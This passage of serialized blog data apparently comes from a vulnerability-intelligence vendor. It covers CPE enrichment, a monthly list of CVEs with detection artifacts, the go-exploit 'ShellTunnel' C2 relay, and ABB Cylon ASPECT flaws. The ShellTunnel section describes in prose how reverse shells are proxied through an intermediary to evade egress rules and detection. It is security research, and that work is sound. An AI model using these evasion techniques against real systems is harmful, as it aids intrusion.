CNA of last resort. Many of these are new and\u002For esoteric software that has never been assigned CPE, and because VulnCheck ",[1131,62399,62400],{},"only"," uses official CPEs created by NIST (to avoid later untangling conflicting CPE) closing this gap is not entirely possible.",[18,62403,62404],{},[68,62405],{":width":10862,"alt":62386,"src":62406},"\u002Fblog\u002Foutpacing-nvd-cpe\u002Fcpe-cna-breakdown.png",[18,62408,62409,62410,62415,62416,62421,62422,62427],{},"Another significant source of CVEs missing CPEs comes from CNAs that release advisories with incomplete or poorly formatted information and neglect to submit the CVE to MITRE. These account for approximately 30% of the CVEs without CPEs in our NVD++ study. Although it sounds unbelievable, our data supports this finding. Here are three examples: ZDI published an advisory for ",[47,62411,62414],{"href":62412,"rel":62413,"target":10881},"https:\u002F\u002Fwww.zerodayinitiative.com\u002Fadvisories\u002FZDI-24-1383\u002F",[51],"CVE-2024-9710"," on October 15 with no corresponding entry on cve.org; Bosch did the same for ",[47,62417,62420],{"href":62418,"rel":62419,"target":10881},"https:\u002F\u002Fpsirt.bosch.com\u002Fsecurity-advisories\u002Fbosch-sa-162032-bt.html",[51],"CVE-2024-33618"," on October 16; and IBM for ",[47,62423,62426],{"href":62424,"rel":62425,"target":10881},"https:\u002F\u002Fwww.ibm.com\u002Fsupport\u002Fpages\u002Fsecurity-bulletin-ibm-qradar-siem-contains-multiple-vulnerabilities-26",[51],"CVE-2024-28786"," on October 17. This pattern repeats daily, averaging around 10 CVEs per day.",[993,62429,62431],{"id":62430},"nvd-faster-cpe-through-automation","NVD++: Faster CPE Through Automation",[18,62433,62434],{},"VulnCheck is able to achieve a faster CPE generation time because our commercial offering, Exploit and Vulnerability Intelligence (EVI), monitors almost 500 unique CVE data sources. EVI normalizes the data sources and makes them available over an API or via bulk download, which gives us a huge lake of data from which to build and normalize CPE data. As VulnCheck continues to invest in EVI, NVD++ will continue improving due to the increased volume of data.",[18,62436,62437],{},"Our commercial customers also greatly benefit from the fast CPE generation times because they have access to our CPE API, which allows them to look up CPEs and receive all the known vulnerabilities without ever even having to integrate with a data source like NVD++ or NIST NVD. Additionally, since we generate everything automatically, our commercially available CPE Dictionary contains new versions significantly faster than the NIST CPE dictionary.",[61,62439,62441],{"id":62440},"accessing-vulncheck-and-nvd-cpe-from-a-single-reliable-source-w-vulncheck-nvd","Accessing VulnCheck and NVD CPE from a Single Reliable Source w\u002F VulnCheck NVD++",[18,62443,62444],{},"VulnCheck NVD++ provides seamless access to both VulnCheck CPE and NIST CPE from a single source. This free community offering delivers the full NIST NVD dataset, enriched with VulnCheck CPE, via high-speed API and bulk download. You can download a complete copy of the data in seconds.",[18,62446,62447,62448,62452,62453,59],{},"To receive CPE faster to better support your customers, go to ",[47,62449,62450],{"href":62450,"rel":62451},"https:\u002F\u002Fwww.vulncheck.com",[51]," and click the “Sign in \u002F Join” button on the top right. You’ll automatically be given access to all of our VulnCheck community offerings, including ",[47,62454,62456],{"href":40670,"rel":62455},[51],"NVD++",{"title":219,"searchDepth":220,"depth":220,"links":62458},[62459,62460,62461,62462,62465,62468],{"id":3520,"depth":220,"text":20},{"id":62329,"depth":220,"text":62330},{"id":62342,"depth":220,"text":62343},{"id":62364,"depth":220,"text":62365,"children":62463},[62464],{"id":62377,"depth":1266,"text":62378},{"id":62393,"depth":220,"text":62394,"children":62466},[62467],{"id":62430,"depth":1266,"text":62431},{"id":62440,"depth":220,"text":62441},"2024-11-14",{"slug":62471},"outpacing-nvd-cpe","\u002Fblog\u002Foutpacing-nvd-cpe",{"title":62306,"description":62317},"blog\u002Foutpacing-nvd-cpe",[33173],"DCG8qVVPyfZeV7cBCsendQEURU_j64ApYqw7MpzPQmw",{"id":62478,"title":62479,"articles":7,"authors":62480,"body":62482,"date":63085,"description":63086,"extension":234,"image":7,"link":7,"meta":63087,"navigation":237,"path":63089,"seo":63090,"series":7,"stem":63091,"subtype":7,"tags":63092,"__hash__":63093},"blog\u002Fblog\u002Finitial-access-intelligence-october-2024.md","Detecting Exploitation w\u002F VulnCheck Initial Access Intelligence - October 2024",[62481],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":62483,"toc":63076},[62484,62486,62492,62495,62499,62508,62512,62520,62523,62527,62530,62534,62537,62555,62559,63054,63056,63064,63069,63071],[18,62485,59412],{},[18,62487,62488],{},[68,62489],{":width":10862,"alt":62490,"src":62491},"Initial Access Intelligence - October 2024","\u002Fblog\u002Finitial-access-intelligence-october-2024\u002FInitial-Access-October-2024.png",[18,62493,62494],{},"In October 2024, VulnCheck crossed 300+ CVEs that have Initial Access Intelligence (IAI) artifacts, developing artifacts for 21 CVEs, covering 16 different vendors and products. 11 of the 22 have confirmed exploitation activity as of November 10th, 2024.",[61,62496,62498],{"id":62497},"expanded-coverage-of-the-flax-typhoon-botnet","Expanded Coverage of the Flax Typhoon Botnet",[18,62500,62501,62502,62507],{},"We've continued to expand detection coverage for CVE's which were discovered to be a target of the recently reported ",[47,62503,62506],{"href":62504,"rel":62505},"http:\u002F\u002Fvulncheck.com\u002Fblog\u002Fflax-typhoon-botnet",[51],"Flax Typhoon Botnet",". This month additional CVE's we've added coverage for include: CVE-2023-26469 (Jorani - LMS), CVE-2023-47218 (QNAP - QTS, QuTS_hero, QuTScloud), CVE-2023-37582 (Apache - RocketMQ), CVE-2019-12168 (Four-Faith - F3x24, F3x36), and CVE-2021-46422 (Telesquare - SDT-CW3B1). VulnCheck now boasts detection coverage for 37 of the 66 CVEs associated with the Flax Typhoon Botnet.",[61,62509,62511],{"id":62510},"detection-artifacts-for-abb-cyclon-aspect-industrial-control-systems","Detection Artifacts for ABB Cyclon ASPECT Industrial Control Systems",[18,62513,62514,62515,62519],{},"During October, we released an initial access artifacts for ABB Cyclon ASPECT CVE-2023-0636 & CVE-2024-6209 including a ",[47,62516,62518],{"href":58306,"rel":62517},[51],"blog post"," and video walkthrough from Jacob Baines exploring the ABB systems exploits and internet connected systems to see what’s accessible and potentially vulnerable.",[59905,62521],{"allow":59907,"allow-full-screen":10874,"frame-border":445,"height":59908,"referrer-policy":59909,"src":62522,"title":59911,"width":10862},"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FmVJnjB1gGrw?si=WNoZkGcsWuGS7rka",[61,62524,62526],{"id":62525},"expanded-visibility-w-fofa-zoomeye-queries","Expanded Visibility w\u002F FOFA & ZoomEye Queries",[18,62528,62529],{},"In October we expanded VulnCheck’s Initial Access query coverage. In addition to providing Shodan, Censys and GreyNoise queries, we have expanded query coverage to now include FOFA & ZoomEye furthering our commitment to helping defenders gain broad visibility into their attack surface.",[61,62531,62533],{"id":62532},"initial-access-intelligence-october-breakdown","Initial Access Intelligence - October Breakdown",[18,62535,62536],{},"To provide better visibility into these updates, we’ve broken down October’s Initial Access Intelligence Artifacts by CVE. For each CVE, we provide a range of detection tools including:",[22,62538,62539,62541,62543,62545,62547,62549,62551,62553],{},[25,62540,325],{},[25,62542,59440],{},[25,62544,59443],{},[25,62546,59446],{},[25,62548,59449],{},[25,62550,59452],{},[25,62552,59455],{},[25,62554,59458],{},[61,62556,62558],{"id":62557},"october-2024-initial-access-artifacts","October 2024 Initial Access Artifacts",[307,62560,62561,62583],{},[310,62562,62563],{},[313,62564,62565,62567,62569,62571,62573,62575,62577,62579,62581],{},[316,62566,61637],{},[316,62568,59474],{},[316,62570,242],{},[316,62572,22852],{},[316,62574,61646],{},[316,62576,59485],{},[316,62578,61651],{},[316,62580,61654],{},[316,62582,61657],{},[336,62584,62585,62608,62630,62652,62675,62698,62720,62741,62763,62786,62808,62831,62852,62874,62896,62919,62942,62964,62987,63009,63032],{},[313,62586,62587,62590,62593,62596,62598,62600,62602,62604,62606],{},[341,62588,62589],{},"Jorani Log Poisoning RCE",[341,62591,62592],{},"2024-10-02",[341,62594,62595],{},"CVE-2023-26469",[341,62597,59510],{},[341,62599,59510],{},[341,62601,59510],{},[341,62603,59510],{},[341,62605,59510],{},[341,62607,59510],{},[313,62609,62610,62613,62615,62618,62620,62622,62624,62626,62628],{},[341,62611,62612],{},"Linear eMerge e3-Series forgot_password Command Injection",[341,62614,62592],{},[341,62616,62617],{},"CVE-2024-9441",[341,62619,59510],{},[341,62621],{},[341,62623,59510],{},[341,62625,59510],{},[341,62627,59510],{},[341,62629],{},[313,62631,62632,62635,62638,62640,62642,62644,62646,62648,62650],{},[341,62633,62634],{},"QNAP QTS and QuTS hero Unauthenticated Remote Code Execution in quick.cgi",[341,62636,62637],{},"2024-10-03",[341,62639,30248],{},[341,62641,59510],{},[341,62643,59510],{},[341,62645,59510],{},[341,62647,59510],{},[341,62649,59510],{},[341,62651],{},[313,62653,62654,62657,62660,62663,62665,62667,62669,62671,62673],{},[341,62655,62656],{},"Apache RocketMQ Arbitrary File Write",[341,62658,62659],{},"2024-10-04",[341,62661,62662],{},"CVE-2023-37582",[341,62664,59510],{},[341,62666,59510],{},[341,62668,59510],{},[341,62670,59510],{},[341,62672,59510],{},[341,62674],{},[313,62676,62677,62680,62683,62686,62688,62690,62692,62694,62696],{},[341,62678,62679],{},"Hash Form WordPress Plugin Nonce Exposure RCE",[341,62681,62682],{},"2024-10-07",[341,62684,62685],{},"CVE-2024-5084",[341,62687,59510],{},[341,62689,59510],{},[341,62691,59510],{},[341,62693,59510],{},[341,62695,59510],{},[341,62697,59510],{},[313,62699,62700,62703,62706,62708,62710,62712,62714,62716,62718],{},[341,62701,62702],{},"Four-Faith Hidden Creds and OS command execution",[341,62704,62705],{},"2024-10-09",[341,62707,58495],{},[341,62709,59510],{},[341,62711,59510],{},[341,62713,59510],{},[341,62715,59510],{},[341,62717,59510],{},[341,62719],{},[313,62721,62722,62725,62727,62729,62731,62733,62735,62737,62739],{},[341,62723,62724],{},"Four-Faith Auth Bypass via Hidden API",[341,62726,62705],{},[341,62728,24221],{},[341,62730,59510],{},[341,62732,59510],{},[341,62734,59510],{},[341,62736,59510],{},[341,62738,59510],{},[341,62740],{},[313,62742,62743,62746,62748,62751,62753,62755,62757,62759,62761],{},[341,62744,62745],{},"Four-Faith Hidden Creds and Information Leak",[341,62747,62705],{},[341,62749,62750],{},"CVE-2024-9643",[341,62752,59510],{},[341,62754,59510],{},[341,62756,59510],{},[341,62758,59510],{},[341,62760,59510],{},[341,62762],{},[313,62764,62765,62768,62771,62774,62776,62778,62780,62782,62784],{},[341,62766,62767],{},"Telesquare SDT-CW3B1 sysCommand RCE",[341,62769,62770],{},"2024-10-16",[341,62772,62773],{},"CVE-2021-46422",[341,62775],{},[341,62777],{},[341,62779,59510],{},[341,62781,59510],{},[341,62783,59510],{},[341,62785],{},[313,62787,62788,62791,62793,62796,62798,62800,62802,62804,62806],{},[341,62789,62790],{},"ABB ASPECT System Credential Disclosure",[341,62792,62770],{},[341,62794,62795],{},"CVE-2024-6209",[341,62797,59510],{},[341,62799,59510],{},[341,62801,59510],{},[341,62803,59510],{},[341,62805,59510],{},[341,62807],{},[313,62809,62810,62813,62816,62819,62821,62823,62825,62827,62829],{},[341,62811,62812],{},"Glibc iconv Buffer Overflow",[341,62814,62815],{},"2024-10-17",[341,62817,62818],{},"CVE-2024-2961",[341,62820,59510],{},[341,62822],{},[341,62824],{},[341,62826],{},[341,62828],{},[341,62830],{},[313,62832,62833,62836,62838,62840,62842,62844,62846,62848,62850],{},[341,62834,62835],{},"Magento XXE Glibc iconv Buffer Overflow RCE",[341,62837,62815],{},[341,62839,62818],{},[341,62841,59510],{},[341,62843,59510],{},[341,62845,59510],{},[341,62847,59510],{},[341,62849,59510],{},[341,62851],{},[313,62853,62854,62857,62859,62862,62864,62866,62868,62870,62872],{},[341,62855,62856],{},"ViciDial Blind SQL Credential Leak",[341,62858,62815],{},[341,62860,62861],{},"CVE-2024-8503",[341,62863,59510],{},[341,62865,59510],{},[341,62867,59510],{},[341,62869,59510],{},[341,62871,59510],{},[341,62873],{},[313,62875,62876,62879,62881,62884,62886,62888,62890,62892,62894],{},[341,62877,62878],{},"ABB ASPECT System networkDiagAjax Command Injection",[341,62880,62815],{},[341,62882,62883],{},"CVE-2023-0636",[341,62885,59510],{},[341,62887,59510],{},[341,62889,59510],{},[341,62891,59510],{},[341,62893,59510],{},[341,62895],{},[313,62897,62898,62901,62904,62907,62909,62911,62913,62915,62917],{},[341,62899,62900],{},"SerComm CPE Router Authenticated Command Injection",[341,62902,62903],{},"2024-10-20",[341,62905,62906],{},"CVE-2021-44080",[341,62908],{},[341,62910],{},[341,62912],{},[341,62914],{},[341,62916],{},[341,62918],{},[313,62920,62921,62924,62927,62930,62932,62934,62936,62938,62940],{},[341,62922,62923],{},"LiteSpeed Cache Weak RNG RCE",[341,62925,62926],{},"2024-10-22",[341,62928,62929],{},"CVE-2024-28000",[341,62931,59510],{},[341,62933,59510],{},[341,62935,59510],{},[341,62937,59510],{},[341,62939,59510],{},[341,62941],{},[313,62943,62944,62947,62949,62952,62954,62956,62958,62960,62962],{},[341,62945,62946],{},"LiteSpeed Cache Credential Leak",[341,62948,62926],{},[341,62950,62951],{},"CVE-2024-44000",[341,62953,59510],{},[341,62955],{},[341,62957,59510],{},[341,62959,59510],{},[341,62961,59510],{},[341,62963,59510],{},[313,62965,62966,62969,62972,62975,62977,62979,62981,62983,62985],{},[341,62967,62968],{},"Palo Alto Network Expedition Authentication Bypass",[341,62970,62971],{},"2024-10-25",[341,62973,62974],{},"CVE-2024-5910",[341,62976],{},[341,62978],{},[341,62980],{},[341,62982,59510],{},[341,62984,59510],{},[341,62986],{},[313,62988,62989,62992,62994,62997,62999,63001,63003,63005,63007],{},[341,62990,62991],{},"Palo Alto Network Expedition Authentication Bypass & Command Injection",[341,62993,62971],{},[341,62995,62996],{},"CVE-2024-9464",[341,62998,59510],{},[341,63000],{},[341,63002,59510],{},[341,63004,59510],{},[341,63006,59510],{},[341,63008],{},[313,63010,63011,63014,63017,63020,63022,63024,63026,63028,63030],{},[341,63012,63013],{},"Fortinet FortiManager Missing Authentication Vulnerability",[341,63015,63016],{},"2024-10-28",[341,63018,63019],{},"CVE-2024-47575",[341,63021],{},[341,63023],{},[341,63025],{},[341,63027],{},[341,63029],{},[341,63031],{},[313,63033,63034,63037,63039,63042,63044,63046,63048,63050,63052],{},[341,63035,63036],{},"Halo Spring WebFlux Path Traversal",[341,63038,63016],{},[341,63040,63041],{},"CVE-2024-38816",[341,63043,59510],{},[341,63045,59510],{},[341,63047,59510],{},[341,63049,59510],{},[341,63051,59510],{},[341,63053],{},[61,63055,59830],{"id":59829},[18,63057,59833,63058,59838,63061],{},[47,63059,59837],{"href":58240,"rel":63060},[51],[47,63062,58240],{"href":58240,"rel":63063},[51],[18,63065,59844,63066,59],{},[47,63067,20558],{"href":14297,"rel":63068},[51],[61,63070,59851],{"id":59850},[18,63072,59854,63073],{},[47,63074,59857],{"href":59857,"rel":63075},[51],{"title":219,"searchDepth":220,"depth":220,"links":63077},[63078,63079,63080,63081,63082,63083,63084],{"id":62497,"depth":220,"text":62498},{"id":62510,"depth":220,"text":62511},{"id":62525,"depth":220,"text":62526},{"id":62532,"depth":220,"text":62533},{"id":62557,"depth":220,"text":62558},{"id":59829,"depth":220,"text":59830},{"id":59850,"depth":220,"text":59851},"2024-11-12","In October 2024, VulnCheck developed new Initial Access Intelligence (IAI) artifacts for 21 CVEs, covering 16 different vendors and products.",{"slug":63088},"initial-access-intelligence-october-2024","\u002Fblog\u002Finitial-access-intelligence-october-2024",{"title":62479,"description":63086},"blog\u002Finitial-access-intelligence-october-2024",[1281],"0eyD94t3wQU2OddMdEXai1qyVvDDitzhm8NRovBnIYU",{"id":63095,"title":63096,"articles":63097,"authors":63103,"body":63105,"date":63300,"description":63301,"extension":234,"image":7,"link":7,"meta":63302,"navigation":237,"path":63304,"seo":63305,"series":7,"stem":63306,"subtype":7,"tags":7,"__hash__":63307},"blog\u002Fblog\u002Fgo-exploit-shelltunnel.md","Introducing a New Command-and-Control Feature in go-exploit: The ShellTunnel",[63098],{"title":63099,"source":63100,"link":63101,"date":63102},"We’re Not Saying “I told you so” – PSW #850","SC Media Paul's Security Weekly Podcast","https:\u002F\u002Fwww.scworld.com\u002Fpodcast-segment\u002F13217-were-not-saying-i-told-you-so-psw-850","2024-11-06",[63104],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":63106,"toc":63289},[63107,63109,63123,63127,63130,63134,63145,63151,63154,63158,63161,63180,63183,63187,63190,63194,63200,63203,63223,63226,63230,63233,63253,63257,63260,63263,63266,63268],[61,63108,20],{"id":3520},[22,63110,63111,63114,63117,63120],{},[25,63112,63113],{},"go-exploit, VulnCheck’s open-source exploit framework, now includes a new C2 feature called ShellTunnel.",[25,63115,63116],{},"ShellTunnel captures reverse shell traffic and routes it through an intermediary attacker-controlled server before reaching the main command-and-control (C2) server.",[25,63118,63119],{},"This setup ensures that the victim device never directly connects to the C2, which can be beneficial in bypassing network egress restrictions.",[25,63121,63122],{},"ShellTunnel is fully compatible with older exploits and requires minimal modification to implement.",[61,63124,63126],{"id":63125},"video-walkthrough-go-exploit-shelltunnel-with-confluence-cve-2023-22527","Video Walkthrough: go-exploit ShellTunnel with Confluence CVE-2023-22527",[59905,63128],{"allow":59907,"allow-full-screen":10874,"frame-border":445,"height":59908,"referrer-policy":59909,"src":63129,"title":59911,"width":10862},"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FDciMcu7aFw8?si=E2pSL4isoWP5pOcE",[61,63131,63133],{"id":63132},"overview-of-go-exploit-and-the-shelltunnel-feature","Overview of go-exploit and the ShellTunnel Feature",[18,63135,63136,63139,63140,63144],{},[47,63137,20558],{"href":14297,"rel":63138},[51]," is a Go-based exploit framework built and maintained by ",[47,63141,63143],{"href":45535,"rel":63142},[51],"VulnCheck’s Initial Access Intelligence"," team. The design uniquely supports a range of flexible C2 configurations. The latest feature to hit go-exploit is ShellTunnel, a new C2 that adds flexibility and operational security by capturing and forwarding reverse shell traffic from an intermediary server before sending it on to the primary C2 server.",[18,63146,63147],{},[68,63148],{":width":10862,"alt":63149,"src":63150},"ShellTunnel C2","\u002Fblog\u002Fgo-exploit-shelltunnel\u002Fsupported-c2.png",[18,63152,63153],{},"What makes ShellTunnel especially appealing is its simplicity and ease of integration. The C2 effectively acts as a proxy shell, allowing teams to redirect traffic through a middle server instead of a direct connection. This is valuable for a variety of operational reasons, including network egress rules that can limit direct connections to external servers.",[61,63155,63157],{"id":63156},"how-shelltunnel-works-in-go-exploit","How ShellTunnel Works in go-exploit",[18,63159,63160],{},"The ShellTunnel setup is straightforward yet powerful. Here’s how it operates:",[1789,63162,63163,63168,63174],{},[25,63164,63165,63167],{},[295,63166,60148],{}," The attacker initiates an attack from an intermediary system using go-exploit. A good example would be an attacker that has compromised a firewall, and is attempting to pivot inwards. The intermediary is the firewall.",[25,63169,63170,63173],{},[295,63171,63172],{},"Reverse Shell Capture:"," The compromised system sends the reverse shell back to the attacker's server (intermediary server or firewall in the above example), where go-exploit is running.",[25,63175,63176,63179],{},[295,63177,63178],{},"Data Forwarding to C2:"," go-exploit’s ShellTunnel then forwards this reverse shell traffic to the main C2 server, creating a separation between the compromised device and the C2.",[18,63181,63182],{},"This separation means that the target device only connects to the attacker’s intermediary server, never to the main C2, which may help avoid detection and reduce certain types of network logging.",[61,63184,63186],{"id":63185},"implementing-shelltunnel-in-real-world-scenarios","Implementing ShellTunnel in Real-World Scenarios",[18,63188,63189],{},"To showcase ShellTunnel, we used an example based on our previously open sourced go-exploit for CVE-2023-22527, affecting Confluence servers (see our previous writeup, Does Confluence Dream of Shells?). We updated the exploit to incorporate the new ShellTunnel feature. This required only a minor version bump and specifying ShellTunnel in the C2 list within the go-exploit configuration.",[61,63191,63193],{"id":63192},"demonstration-shelltunnel-in-action","Demonstration: ShellTunnel in Action",[18,63195,63196],{},[68,63197],{":width":10862,"alt":63198,"src":63199},"ShellTunnel Example","\u002Fblog\u002Fgo-exploit-shelltunnel\u002Fshelltunnel-example.png",[18,63201,63202],{},"To better illustrate, we deployed ShellTunnel in a lab environment using three key components:",[22,63204,63205,63211,63217],{},[25,63206,63207,63210],{},[295,63208,63209],{},"Victim Machine:"," A Windows machine running Confluence, serving as the target of exploitation.",[25,63212,63213,63216],{},[295,63214,63215],{},"Attacker Server:"," This intermediary server captures the reverse shell before forwarding it to the C2.",[25,63218,63219,63222],{},[295,63220,63221],{},"Command and Control Server (C2):"," The final destination for the reverse shell traffic, providing centralized control over the compromised device.",[18,63224,63225],{},"Using this setup, we initiated the attack from the attacker server. After capturing the reverse shell, we forwarded it to the C2 using SSL encryption, enabling us to monitor the traffic with Wireshark for verification. This setup allowed us to observe the traffic flow between each component, with unencrypted traffic between the victim and attacker, and SSL-encrypted traffic from the attacker to the C2.",[61,63227,63229],{"id":63228},"benefits-of-shelltunnel-for-exploitation-campaigns","Benefits of ShellTunnel for Exploitation Campaigns",[18,63231,63232],{},"ShellTunnel’s separation of attacker and C2 connections offers several advantages for exploitation efforts:",[22,63234,63235,63241,63247],{},[25,63236,63237,63240],{},[295,63238,63239],{},"Network Evasion:"," Network rules designed to prevent direct outbound connections may be bypassed, as the victim only needs to connect to the attacker server.",[25,63242,63243,63246],{},[295,63244,63245],{},"Enhanced Operational Security:"," Because the target device does not connect directly to the C2, it reduces exposure to network scans and detection tools that monitor external connections.",[25,63248,63249,63252],{},[295,63250,63251],{},"Ease of Implementation:"," ShellTunnel’s configuration in go-exploit requires minimal changes, making it compatible with existing exploits without extensive modification.",[61,63254,63256],{"id":63255},"how-to-get-started-with-shelltunnel-in-go-exploit","How to Get Started with ShellTunnel in go-exploit",[18,63258,63259],{},"The ShellTunnel update is part of go-exploit’s open-source package, available on GitHub. Once set up, adding ShellTunnel to an exploit requires only a few tweaks to the C2 list within go-exploit, making it accessible for various operational scenarios with minimal setup.",[18,63261,63262],{},"We welcome contributions to go-exploit from the community, so if this feature inspires you to build out new C2 methods or you’d like to see specific functionalities in future releases, feel free to submit a pull request.",[18,63264,63265],{},"ShellTunnel brings a new level of flexibility to go-exploit’s C2 capabilities, adding valuable proxying functionality with easy configuration. By separating the attacker from the C2, it provides an added layer of evasion and operational security, making it a promising addition for scenarios where avoiding direct C2 connections is critical.",[61,63267,202],{"id":201},[18,63269,63270,63271,1246,63275,982,63278,63281,63282,982,63285,63288],{},"The VulnCheck Initial Access team is always looking to advance the state of attack on initial access vulnerabilities. For more research and updates like this, see our blogs, ",[47,63272,63274],{"href":58306,"rel":63273},[51],"Exploring ABB Vulnerabilities",[47,63276,40447],{"href":53829,"rel":63277},[51],[47,63279,35931],{"href":53837,"rel":63280},[51],"\n. Sign up to start a trial of our ",[47,63283,1245],{"href":45535,"rel":63284},[51],[47,63286,216],{"href":214,"rel":63287},[51]," product today.",{"title":219,"searchDepth":220,"depth":220,"links":63290},[63291,63292,63293,63294,63295,63296,63297,63298,63299],{"id":3520,"depth":220,"text":20},{"id":63125,"depth":220,"text":63126},{"id":63132,"depth":220,"text":63133},{"id":63156,"depth":220,"text":63157},{"id":63185,"depth":220,"text":63186},{"id":63192,"depth":220,"text":63193},{"id":63228,"depth":220,"text":63229},{"id":63255,"depth":220,"text":63256},{"id":201,"depth":220,"text":202},"2024-11-01","The latest feature to hit go-exploit is ShellTunnel. ShellTunnel captures reverse shell traffic and routes it through an intermediary attacker-controlled server before reaching the main command-and-control (C2) server.",{"slug":63303},"go-exploit-shelltunnel","\u002Fblog\u002Fgo-exploit-shelltunnel",{"title":63096,"description":63301},"blog\u002Fgo-exploit-shelltunnel","Q2nHAV1ba6AhHd6vDp0vlzitKIXzRgfjPa4iijdbqW0",{"id":63309,"title":58308,"articles":63310,"authors":63336,"body":63338,"date":63470,"description":63471,"extension":234,"image":7,"link":7,"meta":63472,"navigation":237,"path":63474,"seo":63475,"series":7,"stem":63476,"subtype":7,"tags":63477,"__hash__":63479},"blog\u002Fblog\u002Fexploring-abb-ics-vulns.md",[63311,63314,63318,63320,63322,63324,63326,63328,63330,63333],{"title":63312,"source":12149,"link":63313,"date":63300},"VulnCheck finds critical security flaws in ABB building automation and energy management software","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-target-critical-zero-day-vulnerability-in-ptz-cameras\u002F",{"title":63315,"source":19479,"link":63316,"date":63317},"ABB Smart Building Software Flaws Invite In Hackers","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722","2024-11-04",{"title":63315,"source":32210,"link":63319,"date":63317},"https:\u002F\u002Fwww.careersinfosecurity.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":32213,"link":63321,"date":63317},"https:\u002F\u002Fwww.cuinfosecurity.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":32216,"link":63323,"date":63317},"https:\u002F\u002Fwww.databreachtoday.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":32207,"link":63325,"date":63317},"https:\u002F\u002Fwww.devicesecurity.io\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":32222,"link":63327,"date":63317},"https:\u002F\u002Fwww.govinfosecurity.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":32228,"link":63329,"date":63317},"https:\u002F\u002Fwww.inforisktoday.com\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63315,"source":63331,"link":63332,"date":63317},"OTToday","https:\u002F\u002Fwww.ot.today\u002Fabb-smart-building-software-flaws-invite-in-hackers-a-26722",{"title":63334,"source":61436,"link":63335,"date":63317},"Risky Biz News: The mystery at Mango Park, and the Cambodian government's shady reaction","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-the-mystery-at-mango-park-and-the-cambodian-governments-shady-reaction\u002F",[63337],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":63339,"toc":63462},[63340,63342,63359,63363,63366,63369,63373,63376,63382,63391,63397,63401,63409,63414,63418,63421,63427,63430,63434,63445,63447],[1920,63341,20],{"id":3520},[22,63343,63344,63347,63350,63353,63356],{},[25,63345,63346],{},"Vulnerabilities, CVE-2023-0636 and CVE-2024-6209, impact ABB Cylon ASPECT, a widely used building automation and energy management system.",[25,63348,63349],{},"CVE-2023-0636 allows command injection, enabling unauthorized remote code execution. While ABB reports authentication is required, testing reveals this is not always enforced.",[25,63351,63352],{},"CVE-2024-6209 enables unauthenticated file disclosure, allowing attackers to extract plain-text credentials, facilitating further exploits within affected systems.",[25,63354,63355],{},"Our team identified 265 reachable ABB Cylon ASPECT systems online, with 214 remaining unpatched, despite the availability of a patch since 2022.",[25,63357,63358],{},"Proof-of-concept exploits are publicly available, yet threat intelligence platforms show limited exploitation activity.",[61,63360,63362],{"id":63361},"video-walkthrough-abb-cylon-aspect-cve-2023-0636-and-cve-2024-6209","Video Walkthrough: ABB Cylon ASPECT CVE-2023-0636 and CVE-2024-6209",[59905,63364],{"allow":59907,"allow-full-screen":10874,"frame-border":445,"height":59908,"referrer-policy":59909,"src":63365,"title":59911,"width":10862},"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FmVJnjB1gGrw?si=U5XuE05Y6APa6GwB",[18,63367,63368],{},"In this week's Initial Access Research, I dove into two key vulnerabilities in ABB's building automation and energy management software, ABB Cylon Aspect. This software is used in major installations like the American Museum of Natural History and UC Irvine, making these vulnerabilities noteworthy for security teams in the industrial control Systems (ICS) sector.",[61,63370,63372],{"id":63371},"key-vulnerability-cve-2023-0636","Key Vulnerability: CVE-2023-0636",[18,63374,63375],{},"The main focus of the discussion is CVE-2023-0636, a command injection vulnerability in ABB Cylon Aspect. This vulnerability allows for remote code execution, making it a serious threat, particularly in internet-facing systems. While ABB claims authentication is required for exploitation, research shows otherwise, allowing attackers easier access than initially assumed.",[18,63377,63378],{},[68,63379],{":width":10862,"alt":63380,"src":63381},"ABB CVE-2023-0636","\u002Fblog\u002Fexploring-abb-ics-vulns\u002Fcve-2023-0636.png",[18,63383,63384,63385,63390],{},"The VulnCheck team explored exploit data and showcased a proof-of-concept (POC) originally published on ",[47,63386,63389],{"href":63387,"rel":63388},"https:\u002F\u002Fpacketstormsecurity.com\u002Ffiles\u002F181827\u002FABB-Cylon-Aspect-3.07.00-Remote-Code-Execution.html",[51],"Packet Storm"," by security researcher “Liquid Worm.” This POC revealed multiple ways to exploit the command injection, with little resistance in place. VulnCheck verified the vulnerability using internal tooling and developed an unobtrusive version scanner to assess its presence in live systems, discovering 265 reachable systems, of which 214 unpatched systems, despite a patch available since 2022.",[18,63392,63393],{},[68,63394],{":width":10862,"alt":63395,"src":63396},"ABB Vulnerable Hosts","\u002Fblog\u002Fexploring-abb-ics-vulns\u002Fabb-vulnerable-hosts.png",[61,63398,63400],{"id":63399},"further-vulnerabilities-file-disclosure-and-remote-code-execution","Further Vulnerabilities: File Disclosure and Remote Code Execution",[18,63402,63403,63404,63408],{},"In addition to CVE-2023-0636, ",[47,63405,63407],{"href":31494,"rel":63406},[51],"Liquid Worm"," disclosed an unauthenticated file disclosure vulnerability, allowing attackers to retrieve user credentials in plain text. This gap in ABB’s products significantly elevates the risk, as these credentials can then facilitate other command injections and remote code executions within the system.",[18,63410,63411],{},[68,63412],{":width":10862,"alt":63407,"src":63413},"\u002Fblog\u002Fexploring-abb-ics-vulns\u002Fliquid-worm.png",[61,63415,63417],{"id":63416},"real-world-impact-and-action-for-impacted-organizations","Real-World Impact and Action For Impacted Organizations",[18,63419,63420],{},"The VulnCheck team found hundreds of vulnerable ABB Cylon Aspect installations online through platforms like Shodan and Censys. Surprisingly, despite available exploits, no major exploitation activity has been recorded in threat intelligence sources like GreyNoise. However, this discovery underscores the need for organizations with Industrial Control Systems to actively monitor and patch these 